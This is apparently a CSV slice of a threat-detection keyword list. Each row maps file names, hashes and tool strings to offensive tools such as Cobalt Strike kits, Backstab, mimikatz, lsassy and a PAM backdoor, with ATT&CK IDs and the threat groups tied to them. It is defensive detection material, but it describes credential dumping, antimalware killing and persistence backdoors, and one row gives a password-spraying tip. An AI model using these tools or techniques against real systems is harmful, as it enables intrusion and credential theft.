"*bac48f3c63a2e87f4acf5b6e71fc2e75b22b4a9c197e8a14414f07acd44c3622*",".{0,1000}bac48f3c63a2e87f4acf5b6e71fc2e75b22b4a9c197e8a14414f07acd44c3622.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","0","#filehash","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","35152"
"*bacd13f058e7510d63f1958a1aa67acea3e5f74059577dbdafe0420f74e69c05*",".{0,1000}bacd13f058e7510d63f1958a1aa67acea3e5f74059577dbdafe0420f74e69c05.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","35153"
"*bacd392be7fb78662fb91e354b4d6443e824d06ae47d4819b0cdf657c8e02eff*",".{0,1000}bacd392be7fb78662fb91e354b4d6443e824d06ae47d4819b0cdf657c8e02eff.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","35154"
"*Backdoor did not understand the request*",".{0,1000}Backdoor\sdid\snot\sunderstand\sthe\srequest.{0,1000}","offensive_tool_keyword","TripleCross","A Linux eBPF rootkit with a backdoor - C2 - library injection - execution hijacking -  persistence and stealth capabilities.","T1055 - T1021.005 - T1055.011 - T1055.003 - T1547 - T1574 - T1027 - T1070.004 - T1562.001","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/h3xduck/TripleCross","1","0","#linux #content","N/A","10","10","1838","232","2024-04-07T02:06:19Z","2021-10-27T17:47:58Z","35155"
"*Backdoor has been set up successfully*",".{0,1000}Backdoor\shas\sbeen\sset\sup\ssuccessfully.{0,1000}","offensive_tool_keyword","logon_backdoor","automated sticky keys backdoor","T1174 - T1078 - T1546.013","TA0003","N/A","N/A","Persistence","https://github.com/szymon1118/logon_backdoor","1","0","N/A","N/A","6","1","10","4","2016-02-12T11:42:59Z","2016-02-10T22:38:46Z","35156"
"*Backdoor is already removed :)*",".{0,1000}Backdoor\sis\salready\sremoved\s\:\).{0,1000}","offensive_tool_keyword","logon_backdoor","automated sticky keys backdoor","T1174 - T1078 - T1546.013","TA0003","N/A","N/A","Persistence","https://github.com/szymon1118/logon_backdoor","1","0","N/A","N/A","6","1","10","4","2016-02-12T11:42:59Z","2016-02-10T22:38:46Z","35157"
"*Backdoor is already set up ;)*",".{0,1000}Backdoor\sis\salready\sset\sup\s\;\).{0,1000}","offensive_tool_keyword","logon_backdoor","automated sticky keys backdoor","T1174 - T1078 - T1546.013","TA0003","N/A","N/A","Persistence","https://github.com/szymon1118/logon_backdoor","1","0","N/A","N/A","6","1","10","4","2016-02-12T11:42:59Z","2016-02-10T22:38:46Z","35158"
"*Backdoor LNK*",".{0,1000}Backdoor\sLNK.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike kit for Persistence","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/0xthirteen/StayKit","1","0","N/A","N/A","10","10","475","73","2020-01-27T14:53:31Z","2020-01-24T22:20:20Z","35159"
"*Backdoor sent unrecognizable message:*",".{0,1000}Backdoor\ssent\sunrecognizable\smessage\:.{0,1000}","offensive_tool_keyword","TripleCross","A Linux eBPF rootkit with a backdoor - C2 - library injection - execution hijacking -  persistence and stealth capabilities.","T1055 - T1021.005 - T1055.011 - T1055.003 - T1547 - T1574 - T1027 - T1070.004 - T1562.001","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/h3xduck/TripleCross","1","0","#linux #content","N/A","10","10","1838","232","2024-04-07T02:06:19Z","2021-10-27T17:47:58Z","35160"
"*Backdoor Setuped Successfully!*",".{0,1000}Backdoor\sSetuped\sSuccessfully!.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#content","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","35161"
"*Backdoor.*",".{0,1000}Backdoor\..{0,1000}","offensive_tool_keyword","backdoor keyword","keyword observed in multiple backdoor tools","T1037.001 - T1037.002 - T1003.001 - T1001.002 - T1055.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009","N/A","N/A","Exploitation tool","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","35162"
"*backdoor.asp*",".{0,1000}backdoor\.asp.{0,1000}","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0005 - TA0007 - TA0042","N/A","Black Basta - Ajax Security Team - APT41 - ENERGETIC BEAR - APT35","Exploitation tool","https://github.com/sqlmapproject/sqlmap","1","1","#linux","N/A","N/A","10","33939","5862","2025-04-05T12:41:50Z","2012-06-26T09:52:15Z","35163"
"*backdoor.aspx*",".{0,1000}backdoor\.aspx.{0,1000}","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0005 - TA0007 - TA0042","N/A","Black Basta - Ajax Security Team - APT41 - ENERGETIC BEAR - APT35","Exploitation tool","https://github.com/sqlmapproject/sqlmap","1","1","#linux","N/A","N/A","10","33939","5862","2025-04-05T12:41:50Z","2012-06-26T09:52:15Z","35169"
"*backdoor.jsp*",".{0,1000}backdoor\.jsp.{0,1000}","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0005 - TA0007 - TA0042","N/A","Black Basta - Ajax Security Team - APT41 - ENERGETIC BEAR - APT35","Exploitation tool","https://github.com/sqlmapproject/sqlmap","1","1","#linux","N/A","N/A","10","33939","5862","2025-04-05T12:41:50Z","2012-06-26T09:52:15Z","35171"
"*backdoor.php*",".{0,1000}backdoor\.php.{0,1000}","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0005 - TA0007 - TA0042","N/A","Black Basta - Ajax Security Team - APT41 - ENERGETIC BEAR - APT35","Exploitation tool","https://github.com/sqlmapproject/sqlmap","1","1","#linux","N/A","N/A","10","33939","5862","2025-04-05T12:41:50Z","2012-06-26T09:52:15Z","35178"
"*backdoor.sh -v * -p *",".{0,1000}backdoor\.sh\s\-v\s.{0,1000}\s\-p\s.{0,1000}","offensive_tool_keyword","linux-pam-backdoor","Linux PAM Backdoor","T1547.001 - T1556.003","TA0003 - TA0004","N/A","N/A","Persistence","https://github.com/zephrax/linux-pam-backdoor","1","0","#linux","N/A","10","4","328","85","2023-11-13T11:29:44Z","2017-06-08T21:14:34Z","35182"
"*backdoor/traitor.go*",".{0,1000}backdoor\/traitor\.go.{0,1000}","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1068 - T1548.004 - T1611 - T1203 - T1059.004","TA0004 - TA0001 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/liamg/traitor","1","1","#linux","N/A","10","10","6853","651","2024-03-12T21:01:14Z","2021-01-24T10:50:15Z","35184"
"*BackdoorableScript*",".{0,1000}BackdoorableScript.{0,1000}","offensive_tool_keyword","boko","boko.py is an application scanner for macOS that searches for and identifies potential dylib hijacking and weak dylib vulnerabilities for application executables as well as scripts an application may use that have the potential to be backdoored","T1195 - T1078 - T1079 - T1574","TA0006 - TA0008","N/A","N/A","Exploitation tool","https://github.com/bashexplode/boko","1","1","N/A","N/A","N/A","1","71","13","2021-09-28T22:36:01Z","2020-05-22T21:46:33Z","35204"
"*--backdoor-all*",".{0,1000}\-\-backdoor\-all.{0,1000}","offensive_tool_keyword","cobaltstrike","Information released publicly by NCC Group's Full Spectrum Attack Simulation (FSAS) team","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/nccgroup/nccfsas","1","0","N/A","N/A","10","10","611","110","2022-08-05T16:25:42Z","2020-06-25T09:33:45Z","35205"
"*Backdoored PE file save*",".{0,1000}Backdoored\sPE\sfile\ssave.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","35206"
"*Backdooring MSI files is currently not supported.*",".{0,1000}Backdooring\sMSI\sfiles\sis\scurrently\snot\ssupported\..{0,1000}","offensive_tool_keyword","PackMyPayload","A PoC that packages payloads into output containers to evade Mark-of-the-Web flag & demonstrate risks associated with container file formats","T1027 - T1036 - T1048 - T1070 - T1096 - T1195","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/mgeeky/PackMyPayload/","1","0","N/A","N/A","10","10","912","143","2024-06-10T09:50:43Z","2022-02-08T19:26:28Z","35207"
"*BackdoorLNK*",".{0,1000}BackdoorLNK.{0,1000}","offensive_tool_keyword","StayKit","StayKit - Cobalt Strike persistence kit - StayKit is an extension for Cobalt Strike persistence by leveraging the execute_assembly function with the SharpStay .NET assembly. The aggressor script handles payload creation by reading the template files for a specific execution type.","T1059 - T1053 - T1124","TA0003 - TA0008","N/A","N/A","Exploitation tool","https://github.com/0xthirteen/StayKit","1","1","N/A","N/A","N/A","10","475","73","2020-01-27T14:53:31Z","2020-01-24T22:20:20Z","35208"
"*backdoorlnkdialog*",".{0,1000}backdoorlnkdialog.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike kit for Persistence","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/0xthirteen/StayKit","1","1","N/A","N/A","10","10","475","73","2020-01-27T14:53:31Z","2020-01-24T22:20:20Z","35209"
"*backstab.exe*",".{0,1000}backstab\.exe.{0,1000}","offensive_tool_keyword","Backstab","A tool to kill antimalware protected processes","T1562.001 - T1569 - T1059","TA0005 - TA0040 - TA0002","N/A","Black Basta - LockBit","Defense Evasion","https://github.com/Yaxser/Backstab","1","1","N/A","N/A","10","10","1435","244","2021-06-19T20:01:52Z","2021-06-15T16:02:11Z","35210"
"*Backstab.sln*",".{0,1000}Backstab\.sln.{0,1000}","offensive_tool_keyword","Backstab","A tool to kill antimalware protected processes","T1562.001 - T1569 - T1059","TA0005 - TA0040 - TA0002","N/A","Black Basta - LockBit","Defense Evasion","https://github.com/Yaxser/Backstab","1","1","N/A","N/A","10","10","1435","244","2021-06-19T20:01:52Z","2021-06-15T16:02:11Z","35211"
"*backstab.x64.*",".{0,1000}backstab\.x64\..{0,1000}","offensive_tool_keyword","cobaltstrike","BOF combination of KillDefender and Backstab","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Octoberfest7/KDStab","1","1","N/A","N/A","10","10","167","37","2023-03-23T02:22:50Z","2022-03-10T06:09:52Z","35212"
"*backstab.x86.*",".{0,1000}backstab\.x86\..{0,1000}","offensive_tool_keyword","cobaltstrike","BOF combination of KillDefender and Backstab","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Octoberfest7/KDStab","1","1","N/A","N/A","10","10","167","37","2023-03-23T02:22:50Z","2022-03-10T06:09:52Z","35213"
"*Backstab/Driverloading*",".{0,1000}Backstab\/Driverloading.{0,1000}","offensive_tool_keyword","Backstab","A tool to kill antimalware protected processes","T1562.001 - T1569 - T1059","TA0005 - TA0040 - TA0002","N/A","Black Basta - LockBit","Defense Evasion","https://github.com/Yaxser/Backstab","1","1","N/A","N/A","10","10","1435","244","2021-06-19T20:01:52Z","2021-06-15T16:02:11Z","35214"
"*Backstab-master*",".{0,1000}Backstab\-master.{0,1000}","offensive_tool_keyword","Backstab","A tool to kill antimalware protected processes","T1562.001 - T1569 - T1059","TA0005 - TA0040 - TA0002","N/A","Black Basta - LockBit","Defense Evasion","https://github.com/Yaxser/Backstab","1","1","N/A","N/A","10","10","1435","244","2021-06-19T20:01:52Z","2021-06-15T16:02:11Z","35215"
"*BackupOperatorToDA.cpp*",".{0,1000}BackupOperatorToDA\.cpp.{0,1000}","offensive_tool_keyword","BackupOperatorToDA","From an account member of the group Backup Operators to Domain Admin without RDP or WinRM on the Domain Controller","T1078 - T1078.003 - T1021 - T1021.006 - T1112 - T1003.003","TA0005 - TA0001 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/mpgn/BackupOperatorToDA","1","1","N/A","N/A","10","5","421","53","2025-01-04T14:16:46Z","2022-02-15T20:51:46Z","35217"
"*BackupOperatorToDA.exe*",".{0,1000}BackupOperatorToDA\.exe.{0,1000}","offensive_tool_keyword","BackupOperatorToDA","From an account member of the group Backup Operators to Domain Admin without RDP or WinRM on the Domain Controller","T1078 - T1078.003 - T1021 - T1021.006 - T1112 - T1003.003","TA0005 - TA0001 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/mpgn/BackupOperatorToDA","1","1","N/A","N/A","10","5","421","53","2025-01-04T14:16:46Z","2022-02-15T20:51:46Z","35218"
"*BackupOperatorToDA.sln*",".{0,1000}BackupOperatorToDA\.sln.{0,1000}","offensive_tool_keyword","BackupOperatorToDA","From an account member of the group Backup Operators to Domain Admin without RDP or WinRM on the Domain Controller","T1078 - T1078.003 - T1021 - T1021.006 - T1112 - T1003.003","TA0005 - TA0001 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/mpgn/BackupOperatorToDA","1","1","N/A","N/A","10","5","421","53","2025-01-04T14:16:46Z","2022-02-15T20:51:46Z","35219"
"*BackupOperatorToDA-master*",".{0,1000}BackupOperatorToDA\-master.{0,1000}","offensive_tool_keyword","BackupOperatorToDA","From an account member of the group Backup Operators to Domain Admin without RDP or WinRM on the Domain Controller","T1078 - T1078.003 - T1021 - T1021.006 - T1112 - T1003.003","TA0005 - TA0001 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/mpgn/BackupOperatorToDA","1","1","N/A","N/A","10","5","421","53","2025-01-04T14:16:46Z","2022-02-15T20:51:46Z","35220"
"*BackupPrivSAM \\*",".{0,1000}BackupPrivSAM\s\\\\.{0,1000}","offensive_tool_keyword","cobaltstrike","A basic implementation of abusing the SeBackupPrivilege via Remote Registry dumping to dump the remote SAM SECURITY AND SYSTEM hives.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/m57/cobaltstrike_bofs","1","0","N/A","N/A","10","10","164","25","2022-07-23T20:37:52Z","2020-07-30T22:36:51Z","35221"
"*backupprivsam.*",".{0,1000}backupprivsam\..{0,1000}","offensive_tool_keyword","cobaltstrike","A basic implementation of abusing the SeBackupPrivilege via Remote Registry dumping to dump the remote SAM SECURITY AND SYSTEM hives.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/m57/cobaltstrike_bofs","1","1","N/A","N/A","10","10","164","25","2022-07-23T20:37:52Z","2020-07-30T22:36:51Z","35222"
"*Bad password counts dont replicate between domain controllers. Only the PDC knows the real amount of those. Be sure to target the PDC so that accounts don't get locked out*",".{0,1000}Bad\spassword\scounts\sdont\sreplicate\sbetween\sdomain\scontrollers\.\sOnly\sthe\sPDC\sknows\sthe\sreal\samount\sof\sthose\.\sBe\ssure\sto\starget\sthe\sPDC\sso\sthat\saccounts\sdon\'t\sget\slocked\sout.{0,1000}","offensive_tool_keyword","smartbrute","Password spraying and bruteforcing tool for Active Directory Domain Services","T1110.001 - T1110.003","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/ShutdownRepo/smartbrute","1","0","N/A","N/A","10","4","365","54","2024-10-27T20:47:29Z","2021-07-16T14:53:29Z","35224"
"*bad0968b9492c3161ea9b67ecf8520054f90e6d196a7ea0050c8076b2ed2d2a2*",".{0,1000}bad0968b9492c3161ea9b67ecf8520054f90e6d196a7ea0050c8076b2ed2d2a2.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","0","#filehash","N/A","10","10","2105","251","2024-12-31T11:56:19Z","2019-12-03T14:03:41Z","35225"
"*bad19a193019cf92068c5cc4f95906a4e54744349ba8e303e6aee4324e95002d*",".{0,1000}bad19a193019cf92068c5cc4f95906a4e54744349ba8e303e6aee4324e95002d.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","35226"
